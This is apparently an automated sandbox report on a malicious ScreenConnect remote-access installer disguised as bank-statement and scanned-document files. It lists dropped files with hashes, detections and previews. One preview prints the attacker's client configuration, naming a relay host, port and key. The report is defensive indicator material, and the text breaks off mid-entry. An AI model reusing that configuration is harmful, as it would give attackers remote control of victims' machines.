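                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | pzPO97QouM.exe | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | statments.exe | malicious | ScreenConnect Tool |
                                                 C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | Scanned01Document_ms.exe | malicious | ScreenConnect Tool |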
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):219646
                                                                    Entropy (8bit):6.581406265744191
                                                                    Encrypted:false
                                                                    SSDEEP:3072:uZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG1:uZuH2aCGw1ST1wQLdqv1
                                                                    MD5:C920508A10FD63B358772F519AEFC6AB
                                                                    SHA1:EC66470AEA3671F430776A87BC237D3E484F1702
                                                                    SHA-256:9DE8B412D0645EBAF18B9150416085E0373C8C51588D365A89897D2344EE32F1
                                                                    SHA-512:AF1A3D7EBF344DB441167ED2AE466F224D3520118217DFE4296B1BE092C029715099C605A0315BCB4EC27B76399FB9578D1758BFB1955B98621C5954802E43F2
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\59d159.rbs, Author: Joe Security
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):4.646296001566109
                                                                    Encrypted:false
                                                                    SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                    MD5:8B45555EF2300160892C25F453098AA4
                                                                    SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                    SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                    SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):21018
                                                                    Entropy (8bit):7.841465962209068
                                                                    Encrypted:false
                                                                    SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                    MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                    SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                    SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                    SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):50133
                                                                    Entropy (8bit):4.759054454534641
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                    MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                    SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                    SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                    SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):26722
                                                                    Entropy (8bit):7.7401940386372345
                                                                    Encrypted:false
                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):197120
                                                                    Entropy (8bit):6.58476728626163
                                                                    Encrypted:false
                                                                    SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                    MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                    SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                    SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                    SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: , Detection: malicious
                                                                    • Filename: , Detection: malicious
                                                                    • Filename: file.exe, Detection: malicious
                                                                    • Filename: setup.msi, Detection: malicious
                                                                    • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious
                                                                    • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious
                                                                    • Filename: pzPO97QouM.exe, Detection: malicious
                                                                    • Filename: pzPO97QouM.exe, Detection: malicious
                                                                    • Filename: statments.exe, Detection: malicious
                                                                    • Filename: Scanned01Document_ms.exe, Detection: malicious
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):68096
                                                                    Entropy (8bit):6.068776675019683
                                                                    Encrypted:false
                                                                    SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                    MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                    SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                    SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                    SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95520
                                                                    Entropy (8bit):6.505346220942731
                                                                    Encrypted:false
                                                                    SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                    MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                    SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                    SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                    SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 3%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.031251664661689
                                                                    Encrypted:false
                                                                    SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                    MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                    SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                    SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                    SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639136400085158
                                                                    Encrypted:false
                                                                    SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                    MD5:9F823778701969823C5A01EF3ECE57B7
                                                                    SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                    SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                    SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):260168
                                                                    Entropy (8bit):6.416438906122177
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                    MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                    SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                    SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                    SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):61216
                                                                    Entropy (8bit):6.31175789874945
                                                                    Encrypted:false
                                                                    SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                    MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                    SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                    SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                    SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):601376
                                                                    Entropy (8bit):6.185921191564225
                                                                    Encrypted:false
                                                                    SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                    MD5:20AB8141D958A58AADE5E78671A719BF
                                                                    SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                    SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                    SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):842248
                                                                    Entropy (8bit):6.268561504485627
                                                                    Encrypted:false
                                                                    SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                    MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                    SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                    SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                    SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):81696
                                                                    Entropy (8bit):5.862223562830496
                                                                    Encrypted:false
                                                                    SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                    MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                    SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                    SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                    SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3343
                                                                    Entropy (8bit):4.771733209240506
                                                                    Encrypted:false
                                                                    SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                    MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                    SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                    SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                    SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):939
                                                                    Entropy (8bit):5.796466792414452
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                    MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                    SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                    SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                    SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):746
                                                                    Entropy (8bit):5.349174276064173
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                    MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                    SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                    SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                    SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Users\user\Desktop\statsment.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):321
                                                                    Entropy (8bit):5.36509199858051
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                    MD5:1CF2352B684EF57925D98E766BA897F2
                                                                    SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                    SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                    SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):1086792
                                                                    Entropy (8bit):7.793516535218678
                                                                    Encrypted:false
                                                                    SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                    MD5:30CA21632F98D354A940903214AE4DE1
                                                                    SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                    SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                    SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):234
                                                                    Entropy (8bit):4.977464602412109
                                                                    Encrypted:false
                                                                    SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                    MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                    SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                    SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                    SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                    Malicious:false
                                                                    Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):4.62694170304723
                                                                    Encrypted:false
                                                                    SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                    MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                    SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                    SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                    SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
